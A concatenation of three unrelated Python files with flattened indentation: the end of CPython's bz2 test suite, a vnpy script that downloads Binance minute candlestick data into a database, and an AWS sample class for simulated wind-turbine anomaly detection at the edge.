self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), b"")
def testSeekPostEndTwiceMultiStream(self):
self.createTempFile(streams=5)
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT) * 5)
self.assertEqual(bz2f.read(), b"")
def testSeekPreStart(self):
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT)
def testSeekPreStartMultiStream(self):
self.createTempFile(streams=2)
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT * 2)
def testFileno(self):
self.createTempFile()
with open(self.filename, 'rb') as rawf:
bz2f = BZ2File(rawf)
try:
self.assertEqual(bz2f.fileno(), rawf.fileno())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.fileno)
def testSeekable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.seekable())
bz2f.read()
self.assertTrue(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
src = BytesIO(self.DATA)
src.seekable = lambda: False
bz2f = BZ2File(src)
try:
self.assertFalse(bz2f.seekable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.seekable)
def testReadable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertTrue(bz2f.readable())
bz2f.read()
self.assertTrue(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertFalse(bz2f.readable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.readable)
def testWritable(self):
bz2f = BZ2File(BytesIO(self.DATA))
try:
self.assertFalse(bz2f.writable())
bz2f.read()
self.assertFalse(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
bz2f = BZ2File(BytesIO(), "w")
try:
self.assertTrue(bz2f.writable())
finally:
bz2f.close()
self.assertRaises(ValueError, bz2f.writable)
def testOpenDel(self):
self.createTempFile()
for i in range(10000):
o = BZ2File(self.filename)
del o
def testOpenNonexistent(self):
self.assertRaises(OSError, BZ2File, "/non/existent")
def testReadlinesNoNewline(self):
# Issue #1191043: readlines() fails on a file containing no newline.
data = b'BZh91AY&SY\xd9b\x89]\x00\x00\x00\x03\x80\x04\x00\x02\x00\x0c\x00 \x00!\x9ah3M\x13<]\xc9\x14\xe1BCe\x8a%t'
with open(self.filename, "wb") as f:
f.write(data)
with BZ2File(self.filename) as bz2f:
lines = bz2f.readlines()
self.assertEqual(lines, [b'Test'])
with BZ2File(self.filename) as bz2f:
xlines = list(bz2f.readlines())
self.assertEqual(xlines, [b'Test'])
def testContextProtocol(self):
f = None
with BZ2File(self.filename, "wb") as f:
f.write(b"xxx")
f = BZ2File(self.filename, "rb")
f.close()
try:
with f:
pass
except ValueError:
pass
else:
self.fail("__enter__ on a closed file didn't raise an exception")
try:
with BZ2File(self.filename, "wb") as f:
1/0
except ZeroDivisionError:
pass
else:
self.fail("1/0 didn't raise an exception")
def testThreading(self):
# Issue #7205: Using a BZ2File from several threads shouldn't deadlock.
data = b"1" * 2**20
nthreads = 10
with BZ2File(self.filename, 'wb') as f:
def comp():
for i in range(5):
f.write(data)
threads = [threading.Thread(target=comp) for i in range(nthreads)]
with support.start_threads(threads):
pass
def testMixedIterationAndReads(self):
self.createTempFile()
linelen = len(self.TEXT_LINES[0])
halflen = linelen // 2
with BZ2File(self.filename) as bz2f:
bz2f.read(halflen)
self.assertEqual(next(bz2f), self.TEXT_LINES[0][halflen:])
self.assertEqual(bz2f.read(), self.TEXT[linelen:])
with BZ2File(self.filename) as bz2f:
bz2f.readline()
self.assertEqual(next(bz2f), self.TEXT_LINES[1])
self.assertEqual(bz2f.readline(), self.TEXT_LINES[2])
with BZ2File(self.filename) as bz2f:
bz2f.readlines()
self.assertRaises(StopIteration, next, bz2f)
self.assertEqual(bz2f.readlines(), [])
def testMultiStreamOrdering(self):
# Test the ordering of streams when reading a multi-stream archive.
data1 = b"foo" * 1000
data2 = b"bar" * 1000
with BZ2File(self.filename, "w") as bz2f:
bz2f.write(data1)
with BZ2File(self.filename, "a") as bz2f:
bz2f.write(data2)
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(), data1 + data2)
def testOpenBytesFilename(self):
str_filename = self.filename
try:
bytes_filename = str_filename.encode("ascii")
except UnicodeEncodeError:
self.skipTest("Temporary file name needs to be ASCII")
with BZ2File(bytes_filename, "wb") as f:
f.write(self.DATA)
with BZ2File(bytes_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
# Sanity check that we are actually operating on the right file.
with BZ2File(str_filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
def testOpenPathLikeFilename(self):
filename = pathlib.Path(self.filename)
with BZ2File(filename, "wb") as f:
f.write(self.DATA)
with BZ2File(filename, "rb") as f:
self.assertEqual(f.read(), self.DATA)
def testDecompressLimited(self):
"""Decompressed data buffering should be limited"""
bomb = bz2.compress(b'\0' * int(2e6), compresslevel=9)
self.assertLess(len(bomb), _compression.BUFFER_SIZE)
decomp = BZ2File(BytesIO(bomb))
self.assertEqual(decomp.read(1), b'\0')
max_decomp = 1 + DEFAULT_BUFFER_SIZE
self.assertLessEqual(decomp._buffer.raw.tell(), max_decomp,
"Excessive amount of data was decompressed")
# Tests for a BZ2File wrapping another file object:
def testReadBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.read, float())
self.assertEqual(bz2f.read(), self.TEXT)
self.assertFalse(bio.closed)
def testPeekBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
pdata = bz2f.peek()
self.assertNotEqual(len(pdata), 0)
self.assertTrue(self.TEXT.startswith(pdata))
self.assertEqual(bz2f.read(), self.TEXT)
def testWriteBytesIO(self):
with BytesIO() as bio:
with BZ2File(bio, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
self.assertEqual(ext_decompress(bio.getvalue()), self.TEXT)
self.assertFalse(bio.closed)
def testSeekForwardBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwardsBytesIO(self):
with BytesIO(self.DATA) as bio:
with BZ2File(bio) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def test_read_truncated(self):
# Drop the eos_magic field (6 bytes) and CRC (4 bytes).
truncated = self.DATA[:-10]
with BZ2File(BytesIO(truncated)) as f:
self.assertRaises(EOFError, f.read)
with BZ2File(BytesIO(truncated)) as f:
self.assertEqual(f.read(len(self.TEXT)), self.TEXT)
self.assertRaises(EOFError, f.read, 1)
# Incomplete 4-byte file header, and block header of at least 146 bits.
for i in range(22):
with BZ2File(BytesIO(truncated[:i])) as f:
self.assertRaises(EOFError, f.read, 1)
class BZ2CompressorTest(BaseTest):
def testCompress(self):
bz2c = BZ2Compressor()
self.assertRaises(TypeError, bz2c.compress)
data = bz2c.compress(self.TEXT)
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
bz2c = BZ2Compressor()
data = bz2c.compress(b'')
data += bz2c.flush()
self.assertEqual(data, self.EMPTY_DATA)
def testCompressChunks10(self):
bz2c = BZ2Compressor()
n = 0
data = b''
while True:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
data += bz2c.compress(str)
n += 1
data += bz2c.flush()
self.assertEqual(ext_decompress(data), self.TEXT)
@bigmemtest(size=_4G + 100, memuse=2)
def testCompress4G(self, size):
# "Test BZ2Compressor.compress()/flush() with >4GiB input"
bz2c = BZ2Compressor()
data = b"x" * size
try:
compressed = bz2c.compress(data)
compressed += bz2c.flush()
finally:
data = None # Release memory
data = bz2.decompress(compressed)
try:
self.assertEqual(len(data), size)
self.assertEqual(len(data.strip(b"x")), 0)
finally:
data = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Compressor(), proto)
class BZ2DecompressorTest(BaseTest):
def test_Constructor(self):
self.assertRaises(TypeError, BZ2Decompressor, 42)
def testDecompress(self):
bz2d = BZ2Decompressor()
self.assertRaises(TypeError, bz2d.decompress)
text = bz2d.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressChunks10(self):
bz2d = BZ2Decompressor()
text = b''
n = 0
while True:
str = self.DATA[n*10:(n+1)*10]
if not str:
break
text += bz2d.decompress(str)
n += 1
self.assertEqual(text, self.TEXT)
def testDecompressUnusedData(self):
bz2d = BZ2Decompressor()
unused_data = b"this is unused data"
text = bz2d.decompress(self.DATA+unused_data)
self.assertEqual(text, self.TEXT)
self.assertEqual(bz2d.unused_data, unused_data)
def testEOFError(self):
bz2d = BZ2Decompressor()
text = bz2d.decompress(self.DATA)
self.assertRaises(EOFError, bz2d.decompress, b"anything")
self.assertRaises(EOFError, bz2d.decompress, b"")
@bigmemtest(size=_4G + 100, memuse=3.3)
def testDecompress4G(self, size):
# "Test BZ2Decompressor.decompress() with >4GiB input"
blocksize = 10 * 1024 * 1024
block = random.getrandbits(blocksize * 8).to_bytes(blocksize, 'little')
try:
data = block * (size // blocksize + 1)
compressed = bz2.compress(data)
bz2d = BZ2Decompressor()
decompressed = bz2d.decompress(compressed)
self.assertTrue(decompressed == data)
finally:
data = None
compressed = None
decompressed = None
def testPickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(TypeError):
pickle.dumps(BZ2Decompressor(), proto)
def testDecompressorChunksMaxsize(self):
bzd = BZ2Decompressor()
max_length = 100
out = []
# Feed some input
len_ = len(self.BIG_DATA) - 64
out.append(bzd.decompress(self.BIG_DATA[:len_],
max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data without providing more input
out.append(bzd.decompress(b'', max_length=max_length))
self.assertFalse(bzd.needs_input)
self.assertEqual(len(out[-1]), max_length)
# Retrieve more data while providing more input
out.append(bzd.decompress(self.BIG_DATA[len_:],
max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
# Retrieve remaining uncompressed data
while not bzd.eof:
out.append(bzd.decompress(b'', max_length=max_length))
self.assertLessEqual(len(out[-1]), max_length)
out = b"".join(out)
self.assertEqual(out, self.BIG_TEXT)
self.assertEqual(bzd.unused_data, b"")
def test_decompressor_inputbuf_1(self):
# Test reusing input buffer after moving existing
# contents to beginning
bzd = BZ2Decompressor()
out = []
# Create input buffer and fill it
self.assertEqual(bzd.decompress(self.DATA[:100],
max_length=0), b'')
# Retrieve some results, freeing capacity at beginning
# of input buffer
out.append(bzd.decompress(b'', 2))
# Add more data that fits into input buffer after
# moving existing data to beginning
out.append(bzd.decompress(self.DATA[100:105], 15))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[105:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_2(self):
# Test reusing input buffer by appending data at the
# end right away
bzd = BZ2Decompressor()
out = []
# Create input buffer and empty it
self.assertEqual(bzd.decompress(self.DATA[:200],
max_length=0), b'')
out.append(bzd.decompress(b''))
# Fill buffer with new data
out.append(bzd.decompress(self.DATA[200:280], 2))
# Append some more data, not enough to require resize
out.append(bzd.decompress(self.DATA[280:300], 2))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_decompressor_inputbuf_3(self):
# Test reusing input buffer after extending it
bzd = BZ2Decompressor()
out = []
# Create almost full input buffer
out.append(bzd.decompress(self.DATA[:200], 5))
# Add even more data to it, requiring resize
out.append(bzd.decompress(self.DATA[200:300], 5))
# Decompress rest of data
out.append(bzd.decompress(self.DATA[300:]))
self.assertEqual(b''.join(out), self.TEXT)
def test_failure(self):
bzd = BZ2Decompressor()
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
# Previously, a second call could crash due to internal inconsistency
self.assertRaises(Exception, bzd.decompress, self.BAD_DATA * 30)
@support.refcount_test
def test_refleaks_in___init__(self):
gettotalrefcount = support.get_attribute(sys, 'gettotalrefcount')
bzd = BZ2Decompressor()
refs_before = gettotalrefcount()
for i in range(100):
bzd.__init__()
self.assertAlmostEqual(gettotalrefcount() - refs_before, 0, delta=10)
class CompressDecompressTest(BaseTest):
def testCompress(self):
data = bz2.compress(self.TEXT)
self.assertEqual(ext_decompress(data), self.TEXT)
def testCompressEmptyString(self):
text = bz2.compress(b'')
self.assertEqual(text, self.EMPTY_DATA)
def testDecompress(self):
text = bz2.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressEmpty(self):
text = bz2.decompress(b"")
self.assertEqual(text, b"")
def testDecompressToEmptyString(self):
text = bz2.decompress(self.EMPTY_DATA)
self.assertEqual(text, b'')
def testDecompressIncomplete(self):
self.assertRaises(ValueError, bz2.decompress, self.DATA[:-10])
def testDecompressBadData(self):
self.assertRaises(OSError, bz2.decompress, self.BAD_DATA)
def testDecompressMultiStream(self):
text = bz2.decompress(self.DATA * 5)
self.assertEqual(text, self.TEXT * 5)
def testDecompressTrailingJunk(self):
text = bz2.decompress(self.DATA + self.BAD_DATA)
self.assertEqual(text, self.TEXT)
def testDecompressMultiStreamTrailingJunk(self):
text = bz2.decompress(self.DATA * 5 + self.BAD_DATA)
self.assertEqual(text, self.TEXT * 5)
class OpenTest(BaseTest):
"Test the open function."
def open(self, *args, **kwargs):
return bz2.open(*args, **kwargs)
def test_binary_modes(self):
for mode in ("wb", "xb"):
if mode == "xb":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "rb") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "ab") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_implicit_binary_modes(self):
# Test implicit binary modes (no "b" or "t" in mode string).
for mode in ("w", "x"):
if mode == "x":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT)
with self.open(self.filename, "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(self.filename, "a") as f:
f.write(self.TEXT)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read())
self.assertEqual(file_data, self.TEXT * 2)
def test_text_modes(self):
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
for mode in ("wt", "xt"):
if mode == "xt":
unlink(self.filename)
with self.open(self.filename, mode) as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt") as f:
self.assertEqual(f.read(), text)
with self.open(self.filename, "at") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("ascii")
self.assertEqual(file_data, text_native_eol * 2)
def test_x_mode(self):
for mode in ("x", "xb", "xt"):
unlink(self.filename)
with self.open(self.filename, mode) as f:
pass
with self.assertRaises(FileExistsError):
with self.open(self.filename, mode) as f:
pass
def test_fileobj(self):
with self.open(BytesIO(self.DATA), "r") as f:
self.assertEqual(f.read(), self.TEXT)
with self.open(BytesIO(self.DATA), "rb") as f:
self.assertEqual(f.read(), self.TEXT)
text = self.TEXT.decode("ascii")
with self.open(BytesIO(self.DATA), "rt") as f:
self.assertEqual(f.read(), text)
def test_bad_params(self):
# Test invalid parameter combinations.
self.assertRaises(ValueError,
self.open, self.filename, "wbt")
self.assertRaises(ValueError,
self.open, self.filename, "xbt")
self.assertRaises(ValueError,
self.open, self.filename, "rb", encoding="utf-8")
self.assertRaises(ValueError,
self.open, self.filename, "rb", errors="ignore")
self.assertRaises(ValueError,
self.open, self.filename, "rb", newline="\n")
def test_encoding(self):
# Test non-default encoding.
text = self.TEXT.decode("ascii")
text_native_eol = text.replace("\n", os.linesep)
with self.open(self.filename, "wt", encoding="utf-16-le") as f:
f.write(text)
with open(self.filename, "rb") as f:
file_data = ext_decompress(f.read()).decode("utf-16-le")
self.assertEqual(file_data, text_native_eol)
with self.open(self.filename, "rt", encoding="utf-16-le") as f:
self.assertEqual(f.read(), text)
def test_encoding_error_handler(self):
# Test with non-default encoding error handler.
with self.open(self.filename, "wb") as f:
f.write(b"foo\xffbar")
with self.open(self.filename, "rt", encoding="ascii", errors="ignore") \
as f:
self.assertEqual(f.read(), "foobar")
def test_newline(self):
# Test with explicit newline (universal newline mode disabled).
text = self.TEXT.decode("ascii")
with self.open(self.filename, "wt", newline="\n") as f:
f.write(text)
with self.open(self.filename, "rt", newline="\r") as f:
self.assertEqual(f.readlines(), [text])
def test_main():
support.run_unittest(
BZ2FileTest,
BZ2CompressorTest,
BZ2DecompressorTest,
CompressDecompressTest,
OpenTest,
)
support.reap_children()
if __name__ == '__main__':
test_main()
|
download_data_demo2.py
|
"""
Download historical kline (candlestick) data directly from Binance's native API.
"""
import pandas as pd
import time
from datetime import datetime
import requests
import pytz
from vnpy.trader.database import database_manager
pd.set_option('expand_frame_repr', False)  # do not wrap wide DataFrames when printing
from vnpy.trader.object import BarData, Interval, Exchange
BINANCE_SPOT_LIMIT = 1000
BINANCE_FUTURE_LIMIT = 1500
CHINA_TZ = pytz.timezone("Asia/Shanghai")
from threading import Thread
def generate_datetime(timestamp: float) -> datetime:
"""
    Convert a millisecond timestamp to a timezone-aware datetime (Asia/Shanghai).
    :param timestamp: timestamp in milliseconds, as returned by the Binance API
    :return: localized datetime object
"""
dt = datetime.fromtimestamp(timestamp / 1000)
dt = CHINA_TZ.localize(dt)
return dt
def get_binance_data(symbol: str, exchanges: str, start_time: str, end_time: str):
"""
    Download kline data from the Binance exchange.
    :param symbol: trading pair, e.g. BTCUSDT.
    :param exchanges: market type: spot, USDT-margined futures, or coin-margined futures.
    :param start_time: date string in the form 2020-1-1 or 2020-01-01
    :param end_time: date string in the form 2020-1-1 or 2020-01-01
    :return:
"""
api_url = ''
save_symbol = symbol
gate_way = 'BINANCES'
if exchanges == 'spot':
print("spot")
limit = BINANCE_SPOT_LIMIT
save_symbol = symbol.lower()
gate_way = 'BINANCE'
api_url = f'https://api.binance.com/api/v3/klines?symbol={symbol}&interval=1m&limit={limit}'
elif exchanges == 'future':
print('future')
limit = BINANCE_FUTURE_LIMIT
api_url = f'https://fapi.binance.com/fapi/v1/klines?symbol={symbol}&interval=1m&limit={limit}'
elif exchanges == 'coin_future':
print("coin_future")
limit = BINANCE_FUTURE_LIMIT
        api_url = f'https://dapi.binance.com/dapi/v1/klines?symbol={symbol}&interval=1m&limit={limit}'
else:
        raise Exception("The exchanges argument must be one of: spot, future, coin_future")
start_time = int(datetime.strptime(start_time, '%Y-%m-%d').timestamp() * 1000)
end_time = int(datetime.strptime(end_time, '%Y-%m-%d').timestamp() * 1000)
while True:
try:
print(start_time)
url = f'{api_url}&startTime={start_time}'
print(url)
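            # "proxies" is a module-level global defined in the __main__ block below; it is None when no proxy is configured.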
data = requests.get(url=url, timeout=10, proxies=proxies).json()
"""
[
[
                    1591258320000,  // open time
                    "9640.7",       // open price
                    "9642.4",       // high price
                    "9640.6",       // low price
                    "9642.0",       // close price (latest price if the candle is not yet closed)
                    "206",          // volume
                    1591258379999,  // close time
                    "2.13660389",   // quote asset volume (turnover)
                    48,             // number of trades
                    "119",          // taker buy base asset volume
                    "1.23424865",   // taker buy quote asset volume
                    "0"             // unused field, ignore
]
"""
buf = []
for l in data:
bar = BarData(
symbol=save_symbol,
exchange=Exchange.BINANCE,
datetime=generate_datetime(l[0]),
interval=Interval.MINUTE,
volume=float(l[5]),
open_price=float(l[1]),
high_price=float(l[2]),
low_price=float(l[3]),
close_price=float(l[4]),
gateway_name=gate_way
)
buf.append(bar)
database_manager.save_bar_data(buf)
            # Exit once the end time is reached, or once the last candle's close time catches up with the current time.
if (data[-1][0] > end_time) or data[-1][6] >= (int(time.time() * 1000) - 60 * 1000):
break
start_time = data[-1][0]
except Exception as error:
print(error)
time.sleep(10)
def download_spot(symbol):
"""
    Download spot market data (split across three threads).
:return:
"""
t1 = Thread(target=get_binance_data, args=(symbol, 'spot', "2018-1-1", "2019-1-1"))
t2 = Thread(target=get_binance_data, args=(symbol, 'spot', "2019-1-1", "2020-1-1"))
t3 = Thread(target=get_binance_data, args=(symbol, 'spot', "2020-1-1", "2020-11-16"))
t1.start()
t2.start()
t3.start()
t1.join()
t2.join()
t3.join()
def download_future(symbol):
"""
    Download USDT-margined futures data (split across two threads).
:return:
"""
t1 = Thread(target=get_binance_data, args=(symbol, 'future', "2019-9-10", "2020-3-1"))
t2 = Thread(target=get_binance_data, args=(symbol, 'future', "2019-3-1", "2020-11-16"))
t1.start()
t2.start()
t1.join()
t2.join()
if __name__ == '__main__':
    # If you have a proxy, configure it here; if not, set it to None or an empty string "".
    # Either way, make sure this machine can reach Binance, e.g. check whether "ping api.binance.com" succeeds.
    proxy_host = "127.0.0.1"  # set to "" if you have no proxy, otherwise your proxy host, e.g. 127.0.0.1
    proxy_port = 1087  # your proxy port, e.g. 1087; set to 0 if you have no proxy (api.binance.com must still be reachable)
proxies = None
if proxy_host and proxy_port:
proxy = f'http://{proxy_host}:{proxy_port}'
proxies = {'http': proxy, 'https': proxy}
symbol = "BTCUSDT"
    # download_spot(symbol)  # download spot data.
    download_future(symbol)  # download futures data
|
windfarm-checkpoint.py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import threading
import math
import random
import pywt
import numpy as np
import pandas as pd
import logging
import time
import os
from turbine import WindTurbine
from edgeagentclient import EdgeAgentClient
class WindTurbineFarm(object):
"""
    This is the application class. It is responsible for:
    - Create virtual edge devices (as threads)
    - Launch one Edge Agent in each virtual device
    - Load the anomaly detection model for the Wind Turbine into the Edge Agent
    - Launch the virtual Wind Turbines
    - Launch an Edge Agent Client that integrates the Wind Turbine with the Edge Device
- Display the UI
"""
def __init__(self, n_turbines):
self.artifacts_path = os.environ.get("ARTIFACTS_PATH")
self.raw_data = pd.read_csv(f'{self.artifacts_path}/dataset_wind.csv.gz', compression="gzip", sep=',', low_memory=False).values
self.n_turbines = n_turbines
self.turbines = [WindTurbine(i, self.raw_data) for i in range(self.n_turbines)]
self.data_buffer = [[] for i in range(self.n_turbines)]
## launch edge agent clients
self.edge_agent = EdgeAgentClient('/tmp/aws.greengrass.SageMakerEdgeManager.sock')
self.model_meta = [{'model_name':None} for i in range(self.n_turbines)]
# we need to load the statistics computed in the data prep notebook
        # these statistics will be used to normalize the input
self.raw_std = np.load(f'{self.artifacts_path}/raw_std.npy')
self.mean = np.load(f'{self.artifacts_path}/mean.npy')
self.std = np.load(f'{self.artifacts_path}/std.npy')
# then we load the thresholds computed in the training notebook
# for more info, take a look on the Notebook #2
self.thresholds = np.load(f'{self.artifacts_path}/thresholds.npy')
# configurations to format the time based data for the anomaly detection model
# If you change these parameters you need to retrain your model with the new parameters
self.INTERVAL = 5 # seconds
        self.TIME_STEPS = 20 * self.INTERVAL # 50ms sampling -> 20 samples per second, times INTERVAL seconds
self.STEP = 10
# these are the features used in this application
        self.feature_ids = [8, 9, 10, 7, 22, 5, 6] # qx, qy, qz, qw, wind_speed_rps, rps, voltage
self.n_features = 6 # roll, pitch, yaw, wind_speed, rotor_speed, voltage
self.running = False # running status
        # minimum buffer length for denoising; we need to accumulate some samples before denoising
self.min_num_samples = 500
self.max_buffer_size = 500
for idx in range(n_turbines):
for j in range(self.max_buffer_size):
self.__read_next_turbine_sample__(idx)
def __create_dataset__(self, X, time_steps=1, step=1):
"""
This encodes a list of readings into the correct shape
expected by the model. It uses the concept of a sliding window
"""
Xs = []
for i in range(0, len(X) - time_steps, step):
v = X[i:(i + time_steps)]
Xs.append(v)
return np.array(Xs)
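    # Shape note (illustrative): with the class defaults TIME_STEPS=100 and STEP=10,
    # a buffer of 500 rows x 6 features yields an output of shape (40, 100, 6)
    # (one window every 10 samples, each window 100 samples long).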
def __euler_from_quaternion__(self, x, y, z, w):
"""
Convert a quaternion into euler angles (roll, pitch, yaw)
roll is rotation around x in radians (counterclockwise)
pitch is rotation around y in radians (counterclockwise)
yaw is rotation around z in radians (counterclockwise)
"""
t0 = +2.0 * (w * x + y * z)
t1 = +1.0 - 2.0 * (x * x + y * y)
roll_x = math.atan2(t0, t1)
t2 = +2.0 * (w * y - z * x)
t2 = +1.0 if t2 > +1.0 else t2
t2 = -1.0 if t2 < -1.0 else t2
pitch_y = math.asin(t2)
t3 = +2.0 * (w * z + x * y)
t4 = +1.0 - 2.0 * (y * y + z * z)
yaw_z = math.atan2(t3, t4)
return roll_x, pitch_y, yaw_z # in radians
def __wavelet_denoise__(self, data, wavelet, noise_sigma):
'''
Filter accelerometer data using wavelet denoising
Modification of F. Blanco-Silva's code at: https://goo.gl/gOQwy5
'''
wavelet = pywt.Wavelet(wavelet)
levels = min(5, (np.floor(np.log2(data.shape[0]))).astype(int))
# Francisco's code used wavedec2 for image data
wavelet_coeffs = pywt.wavedec(data, wavelet, level=levels)
threshold = noise_sigma*np.sqrt(2*np.log2(data.size))
new_wavelet_coeffs = map(lambda x: pywt.threshold(x, threshold, mode='soft'), wavelet_coeffs)
return pywt.waverec(list(new_wavelet_coeffs), wavelet)
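    # Illustrative usage (hypothetical values): __wavelet_denoise__(signal, 'db6', 0.1)
    # returns a denoised 1-D array; note that pywt.waverec can return one extra sample
    # for odd-length inputs, so callers should not assume the output length matches exactly.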
def __del__(self):
"""Destructor"""
self.halt()
def is_noise_enabled(self, turbine_id):
return [self.turbines[turbine_id].is_noise_enabled('Vib'),
self.turbines[turbine_id].is_noise_enabled('Rot'),
self.turbines[turbine_id].is_noise_enabled('Vol')]
def __data_prep__(self, turbine_id, buffer):
"""
This method is called for each reading.
Here we do some data prep and accumulate the data in the buffer
for denoising
"""
new_buffer = []
for data in buffer:
roll,pitch,yaw = self.__euler_from_quaternion__(
data[self.feature_ids[0]],data[self.feature_ids[1]],
data[self.feature_ids[2]],data[self.feature_ids[3]]
)
row = [roll,pitch,yaw, data[self.feature_ids[4]],data[self.feature_ids[5]], data[self.feature_ids[6]]]
new_buffer.append(row)
return np.array(new_buffer)
def __prep_turbine_sample__(self, turbine_id, data):
vib_noise,rot_noise,vol_noise = self.is_noise_enabled(turbine_id)
        # feature_ids = [8, 9, 10, 7, 22, 5, 6] -> qx, qy, qz, qw, wind_speed_rps, rps, voltage
if vib_noise: data[self.feature_ids[0:4]] = np.random.rand(4) * 100 # out of the radians range
if rot_noise: data[self.feature_ids[5]] = np.random.rand(1) * 100 # out of the normalized wind range
if vol_noise: data[self.feature_ids[6]] = int(np.random.rand(1)[0] * 10000) # out of the normalized voltage range
self.data_buffer[turbine_id].append(data)
if len(self.data_buffer[turbine_id]) > self.max_buffer_size:
del self.data_buffer[turbine_id][0]
def get_raw_data(self, turbine_id):
assert(turbine_id >= 0 and turbine_id < len(self.data_buffer))
self.__read_next_turbine_sample__(turbine_id)
return self.data_buffer[turbine_id]
def __read_next_turbine_sample__(self, turbine_id):
self.__prep_turbine_sample__(turbine_id, self.turbines[turbine_id].read_next_sample() )
def __detect_anomalies__(self):
"""
Keeps processing the data collected from the turbines
        and does anomaly detection. It reports to each turbine the
anomalies detected (through a callback)
"""
while self.running:
# for each turbine, check the buffer
start_time = time.time()
for idx in range(self.n_turbines):
print(idx)
buffer = self.get_raw_data(idx)
if len(buffer) >= self.min_num_samples:
# create a copy & prep the data
data = self.__data_prep__(idx, np.array(buffer) )
if not self.edge_agent.is_model_loaded(self.model_meta[idx]['model_name']):
print('model is not loaded')
continue
# denoise
data = np.array([self.__wavelet_denoise__(data[:,i], 'db6', self.raw_std[i]) for i in range(self.n_features)])
data = data.transpose((1,0))
# normalize
data -= self.mean
data /= self.std
data = data[-(self.TIME_STEPS+self.STEP):]
# create the dataset and reshape it
x = self.__create_dataset__(data, self.TIME_STEPS, self.STEP)
x = np.transpose(x, (0, 2, 1)).reshape(x.shape[0], self.n_features, 10, 10)
# run the model
p = self.edge_agent.predict(self.model_meta[idx]['model_name'], x)
if p is not None:
a = x.reshape(x.shape[0], self.n_features, 100).transpose((0,2,1))
b = p.reshape(p.shape[0], self.n_features, 100).transpose((0,2,1))
# check the anomalies
pred_mae_loss = np.mean(np.abs(b - a), axis=1).transpose((1,0))
values = np.mean(pred_mae_loss, axis=1)
anomalies = (values > self.thresholds)
elapsed_time = time.time() - start_time
            time.sleep(max(0.0, 0.5 - elapsed_time))  # avoid a negative sleep when an iteration takes longer than 0.5s
def load_model(self, model_name, model_version):
logging.info("Loading model %s version %s" % ( model_name, model_version))
model_path = os.environ.get("MODEL_PATH")
ret = self.edge_agent.load_model(model_name, model_path)
if ret is not None:
for device_id in range(self.n_turbines):
self.model_meta[device_id]['model_name'] = model_name
self.model_meta[device_id]['model_path'] = model_path
self.model_meta[device_id]['model_version'] = model_version
def start(self):
"""
Run the main application by creating the Edge Agents, loading the model and
kicking-off the anomaly detector program
"""
self.load_model("WindTurbineAnomalyDetection", "1.0")
